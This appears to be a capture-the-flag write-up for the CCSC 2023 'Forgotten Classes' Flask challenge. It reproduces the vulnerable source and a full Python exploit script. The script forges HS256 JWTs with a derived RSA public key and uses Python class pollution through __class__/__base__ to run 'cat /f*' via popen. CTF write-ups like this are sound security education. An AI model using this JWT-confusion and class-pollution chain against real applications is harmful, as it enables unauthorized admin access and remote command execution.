CCSC 2023 Forgotten Classes

16/07/2023 - 5 minutes

2023 ccsc class_pollution ctf ctfs flask hacking inheritance jwt python web

Table of contents

Description

This is an old API for a classroom application that is no longer used due to the AI takeover. Inside information states the API is still available and is connected to the AIs internal infrastructure. Can you can hack it and read any hidden secrets on the root / path of the server?

Author: sAINT_barber

Enumeration

Let's download the provided zip source code and crunch through it in vscode Firstly to get a gist of what this application does let's view the Dockerfile and get the challenge set up for some local testing

Dockerfile

FROM python:3.9

WORKDIR /app

COPY flag.txt /flag-probably-some-random-string-here.txt

COPY requirements.txt .

RUN pip install -r requirements.txt

COPY middleware/ middleware
COPY pyjwt/ pyjwt
COPY routes/ routes
COPY app.py app.py
COPY database.py database.py
COPY models.py models.py
COPY utils.py utils.py

RUN pip install -e pyjwt

EXPOSE 3000

CMD ["python", "app.py"]

2 things stick out imminently

  1. Whenever the flag is flag-randomChars.txt, it means that the challenge wants us to gain some kind of RCE to find out that random suffix and a simple file-read just won't cut it.
  2. it is installing requirements from requirements.txt for everything except pyjwt for which we were also provided a pyjwt directory, this is particularly odd hence I seeked to find out why this was done

Pyjwt

image_2_f6975970.png

This seems like a normal pip module installation files. Hence I went to the official pyjwt github to download the latest released pyjwt version and find out there differences structure.png

Again 1 thing stands out from the files that have differences jwt/algorithms.py, so let's compare that file in vscode image_4_f6975970.png

Aha! This seems very interesting

Original

def prepare_key(self, key: str | bytes) -> bytes:
key_bytes = force_bytes(key)

if is_pem_format(key_bytes) or is_ssh_key(key_bytes):
	raise InvalidKeyError(
		"The specified key is an asymmetric key or x509 certificate and"
		" should not be used as an HMAC secret."
	)

return key_bytes

Modified

   def prepare_key(self, key: str | bytes) -> bytes:
	   key_bytes = force_bytes(key)

	   # This kept on breaking my code - I IS DEVELOPEEERRR - also send me a message if you find this section, im curious to know why you're here :D ~ sAINT_barber

	   # if is_pem_format(key_bytes) or is_ssh_key(key_bytes):
	   #     raise InvalidKeyError(
	   #         "The specified key is an asymmetric key or x509 certificate and"
	   #         " should not be used as an HMAC secret."
	   #     )

	   return key_bytes

We can see that the pyjwt library has been modfied to allow public keys to be used as an HMAC secret for jwt algorithms such as HS256, let's keep this in mind and continue reading through the application

app.py

from flask import Flask
from routes.routes import bp
from database import db
import secrets

app = Flask(__name__)
app.config['JWT_SECRET_KEY'] = secret_key = secrets.token_hex(32)

app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///classroom.db'

app.register_blueprint(bp)

db.initialize_database()
db.disconnect()

if __name__ == '__main__':
   from waitress import serve
   serve(app, host="0.0.0.0", port=3000)

Nothing really out of the ordinary here, lets look at the routes

routes/routes.py

from flask import Blueprint, request, jsonify
from database import hash_password, db
from models import Admin, Student, Teacher, Janitor, ComputerRoom
from middleware.authorization import create_access_token, verify, admin_required, public_key_pem
from utils import merge

bp = Blueprint('bp',__name__)

@bp.before_request
def validate_content_type():
   if request.method != 'GET' and not request.is_json:
	   return jsonify({'error': 'Invalid Content-Type. Only JSON requests are accepted.'}), 400


@bp.route('/', methods=['GET'])
@verify
def home(user):
   msg = f"""Hello {user.username}! Here is your card info:
   ID: {user.id}
   Role: {user.role}
   """
   return msg, 200


@bp.route('/login', methods=['POST'])
def login():

   data = request.json
   username = data.get('username')
   password = hash_password(data.get('password'))

   row = db.login({
	   "username":username,
	   "password":password
   })
   if row:
	   id, username, role = row
	   payload = {
		   'id': id,
		   'username': username,
		   'role': role
	   }

	   access_token = create_access_token(payload, algorithm='RS256')
	   return jsonify({'access_token': access_token}), 200
   else:
	   return jsonify({'error': 'Wrong username/password'}), 401


@bp.route('/register', methods=['POST'])
def register():

   data = request.json
   username = data.get('username')
   password = hash_password(data.get('password'))

   data = {
	   "username":username,
	   "password":password,
	   "role": "student"
   }

   if db.user_exists(data):
	   return jsonify({'message': 'User exists.'}), 401

   db.insert_user(data)

   return jsonify({'message': 'User registered successfully.'}), 201


@bp.route('/update', methods=['POST'])
@verify
def update(user):
   update_info = request.json
   merge(update_info, user)
   return jsonify({'message': "User updated successfully", 'user': user.__dict__}), 200

@bp.route('/admin', methods=['GET'])
@verify
@admin_required
def admin(user):
   room = ComputerRoom()
   msg = f"""Welcome {user.username}, here are the stats:
   {room.get_max(40)}
   {room.last_login()}
   """
   return msg, 200

Let's break the above down:

middleware/authorization.py

from flask import current_app, request, jsonify, g
from functools import wraps
from models import Admin, Student, Teacher, Janitor
import jwt
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

app = current_app

private_key = rsa.generate_private_key(
  public_exponent=65537,
  key_size=2048
)

private_key_pem = private_key.private_bytes(
  encoding=serialization.Encoding.PEM,
  format=serialization.PrivateFormat.PKCS8,
  encryption_algorithm=serialization.NoEncryption()
)

public_key_pem = private_key.public_key().public_bytes(
  encoding=serialization.Encoding.PEM,
  format=serialization.PublicFormat.SubjectPublicKeyInfo
)


def verify(f):
  @wraps(f)
  def decorated(*args, **kwargs):
   token = request.headers.get('Authorization')
   print(f"Verifying token: {token}")
   if not token:
	   return jsonify({'message': "Token is missing"}), 401

   token = token.split(" ")[1]
   try:
	   alg = jwt.get_unverified_header(token)['alg']
	   if alg in ['HS256', 'RS256']:

		   token = jwt.decode(token, public_key_pem, algorithms=[alg])
		   role  = token.get('role', 'student')

		   if role == "admin":
			   user = Admin(token.get('id'), token.get('username'))
		   elif role == "student":
			   user = Student(token.get('id'), token.get('username'))
		   elif role == "teacher":
			   user = Teacher(token.get('id'), token.get('username'))
		   elif role == "janitor":
			   user = Janitor(token.get('id'), token.get('username'))
		   else:
			   user = Student(token.get('id'), token.get('username'))

		   g.user = user
	   else:
		   return jsonify({'message': "Invalid algorithm"}), 500

   except jwt.ExpiredSignatureError:
	   return jsonify({'message': "Token has expired"}), 401
   except jwt.InvalidTokenError:
	   return jsonify({'message': "Invalid token"}), 401
   except Exception:
	   return jsonify({'message': "You broke me :("}), 500

   return f(user, *args, **kwargs)
  return decorated

def create_access_token(payload, algorithm='HS256'):
  if algorithm == 'HS256':
   signing_key = public_key_pem
  elif algorithm == 'RS256':
   signing_key = private_key_pem.decode()
  else:
   raise ValueError(f'Invalid algorithm: {algorithm}')

  open('public.pem', 'wb').write(public_key_pem)
  token = jwt.encode(payload, signing_key, algorithm=algorithm)

  return token

def admin_required(f):
  @wraps(f)
  def decorated(*args, **kwargs):
   user = getattr(g, 'user', None)
   if user and user.role == 'admin':
	   return f(*args, **kwargs)
   else:
	   return jsonify({'message': "Access denied. User is not an admin", 'user': user.__dict__}), 403

  return decorated

The verify function allows for two type of jwt algorithms to be used ['HS256', 'RS256'], a very peculiar thing to support. In addition we can see that public_key_pem is used as the public key for RS256 and as the HMAC secret for HS256, which is very odd as usually public keys are considered public information and are easy to retrieve, hence are not really kept secret to be used as HMAC secrets for HS256.

models.py

from os import popen

class User:
   def __init__(self, id, username, role) -> None:
	   self.id = id
	   self.username = username
	   self.role = role

class Admin(User):
   def __init__(self, id, username):
	   super().__init__(id, username, 'admin')

class Teacher(User):
   def __init__(self, id, username):
	   super().__init__(id, username, 'teacher')

class Student(User):
   def __init__(self, id, username):
	   super().__init__(id, username, 'student')

class Classroom:
   def get_max(self, students):
	   return f"Max students: {students}\n"

class ComputerRoom(Classroom):
   def last_login(self):
	   command = self.cmd if hasattr(self, 'cmd') else 'date'
	   return f'Last login: {popen(command).read().strip()}'

class TechnologyRoom(Classroom):
   def get_items(self):
	   return "There are 100 soldering irons left"

class Janitor(TechnologyRoom):
   def __init__(self, id, username) -> None:
	   self.id = id
	   self.username = username
	   self.role = "janitor"
class ComputerRoom(Classroom):
   def last_login(self):
	   command = self.cmd if hasattr(self, 'cmd') else 'date'
	   return f'Last login: {popen(command).read().strip()}'

We can observe that the ComputerRoom class(which is only ever instantiated in /admin ) function last_login use popen with a self.cmd command to get the currend date and time to display as last_login time of a user. This is very important as it is probably our RCE entrypoint, hence let's note down that we somehow need ComputerRoom.command to be set to something to read the flag

utils.py

def merge(src, dst):
   for k, v in src.items():
	   if k == "__init__": # No init for you! :(
		   break
	   if hasattr(dst, '__getitem__'):
		   if dst.get(k) and type(v) == dict:
			   merge(v, dst.get(k))
		   else:
			   dst[k] = v
	   elif hasattr(dst, k) and type(v) == dict:
		   merge(v, getattr(dst, k))
	   else:
		   setattr(dst, k, v)

Ok so: merge functions are usually the main causes for prototype pollution in javascript and the class polution for python Reading through the above scenario we can see that our most powerful weapon with such a vulnerability is taking control of python's globals by/or changing functions' __init__ constructors, which gives us complete control over the application. But did you think it would be this easy? Hahaha think again! Every payload performing such things, used __init__ which is blocked for us on the above function.

The only part we can then use to our advantage is Creating class property default value to RCE (subprocess) from the Gadget examples in the hacktricks page. This essentially allows us to use __base__ to climb the python inheritance tree and pivot from child to parent classes.

Exploitation

Now that we have a very good enumeration done on the application, let's try to piece together exploit paths/plans!

Revisiting the classes in models.py and possibilities for RCE

inheritance.png

As my very beautiful diagram shows our only way to use the above discovered gadgets to set ComputerRoom.command is to climb all the way to Classroom from the Janitor class. Janitor->TechnologyRoom->Classroom

Hence assuming we somehow become janitors and then admins we can set the comand to read the flag file and login and see as last_login date the so wanted flag.

Exploitation plan

  1. Login as janitor and use /update to get a value to self.command with {"__class__":{"__base__": {"__base__": {"cmd": "cat /f*"}}}}
  2. Login as admin and view the flag

The question then becomes how do we become a janitor or an admin as we can only register as students?

Forging a cookie

Creating our own cookie with any values we want becomes very easy if we manage to leak the public key which is used as the HMAC secret for encoding/decoding an HS256 cookie

But then how do we get the public key if it is never directly provided to us? Googling around we can find this wonderful portswigger page on Algorithm confusion attacks And here it is Deriving public keys from existing tokens, exactly what we are looking for! Apparently there is a tool(https://github.com/silentsignal/rsa_sign2n) which can do some RSA maths(determines common RSA modulus with gcd) and determine possible public key and give them to us as pem files, exactly what we need.

Thus, I combined all the above to a beautiful automated(except the public key derivation part) exploit script

Exploit script

import httpx
import jwt

url = "http://challenges.cybermouflons.com:10070"
# url = "http://172.17.0.2:3000"

def create_access_token(payload, algorithm='HS256', key=None):
	token = jwt.encode(payload, key, algorithm=algorithm)
	return token

def register(username, password):
	r = httpx.post(f"{url}/register", json={"username": username, "password": password}, headers={"Content-Type": "application/json"})
	return r

def login(username, password):
	r = httpx.post(f"{url}/login", json={"username": username, "password": password}, headers={"Content-Type": "application/json"})
	return r, r.json()["access_token"]

def update(token, payload):
	r = httpx.post(f"{url}/update", headers={"Content-Type": "application/json", "Authorization": f"Bearer {token}"}, json=payload)

def info(token):
	r = httpx.get(f"{url}", headers={"Content-Type": "application/json", "Authorization": f"Bearer {token}"})
	return r, r.text

def admin(token):
	r = httpx.get(f"{url}/admin", headers={"Content-Type": "application/json", "Authorization": f"Bearer {token}"})
	return r, r.text

r = register("evangelospro1", "1234")
# print(r.text)
r, token1 = login("evangelospro1", "1234")
r = register("evangelospro2", "1234")
# print(r.text)
r, token2 = login("evangelospro2", "1234")

print(f"TOKEN1: {token1}")
print(f"TOKEN2: {token2}")

input("find the public key using https://github.com/silentsignal/rsa_sign2n press enter to continue")

public_key_pem = open("public.pem", "rb").read()
print(public_key_pem)

# craft janitor token with pem key as the secret for HS256 ignore any signature errors
payload = {
		   'id': 3,
		   'username': "evangelospro",
		   'role': "janitor"
	   }
janitor_token = create_access_token(payload, algorithm='HS256', key=public_key_pem)
print(f"JANITOR TOKEN: {janitor_token}")
# print(jwt.decode(janitor_token, public_key_pem, algorithms=['HS256']))
res = info(janitor_token)
print(res)

# JANITOR PHASE
update(janitor_token, {"__class__":{"__base__": {"__base__": {"cmd": "cat /f*"}}}})

# ADMIN PHASE
payload = {
		'id': 4,
		'username': "admin",
		'role': "admin"
	}
admin_token = create_access_token(payload, algorithm='HS256', key=public_key_pem)
print(f"ADMIN TOKEN: {admin_token}")
res = admin(admin_token)
print(res)

Results